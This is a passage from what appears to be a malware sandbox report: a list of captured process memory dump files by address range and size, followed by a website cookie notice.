        • memory/2660-267-0x0000000000400000-0x0000000000463000-memory.dmp

          Filesize

          396KB

        • memory/3064-125-0x0000000000480000-0x00000000004EA000-memory.dmp

          Filesize

          424KB

        • memory/4024-147-0x0000000000CF0000-0x0000000000D46000-memory.dmp

          Filesize

          344KB

        • memory/4724-110-0x0000000072C60000-0x0000000073410000-memory.dmp

          Filesize

          7.7MB

        • memory/4724-103-0x00000000002F0000-0x0000000000350000-memory.dmp

          Filesize

          384KB

        • memory/4724-102-0x0000000072C6E000-0x0000000072C6F000-memory.dmp

          Filesize

          4KB

        • memory/4724-255-0x0000000072C60000-0x0000000073410000-memory.dmp

          Filesize

          7.7MB

        • memory/5040-161-0x0000000061E00000-0x0000000061EF3000-memory.dmp

          Filesize

          972KB

        • memory/5040-151-0x0000000000400000-0x0000000000661000-memory.dmp

          Filesize

          2.4MB

        • memory/5040-149-0x0000000000400000-0x0000000000661000-memory.dmp

          Filesize

          2.4MB

        • memory/5088-0-0x000000007530E000-0x000000007530F000-memory.dmp

          Filesize

          4KB

        • memory/5088-11-0x0000000075300000-0x0000000075AB0000-memory.dmp

          Filesize

          7.7MB

        • memory/5088-1-0x0000000000660000-0x00000000006CA000-memory.dmp

          Filesize

          424KB

        • memory/5088-79-0x0000000075300000-0x0000000075AB0000-memory.dmp

          Filesize

          7.7MB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.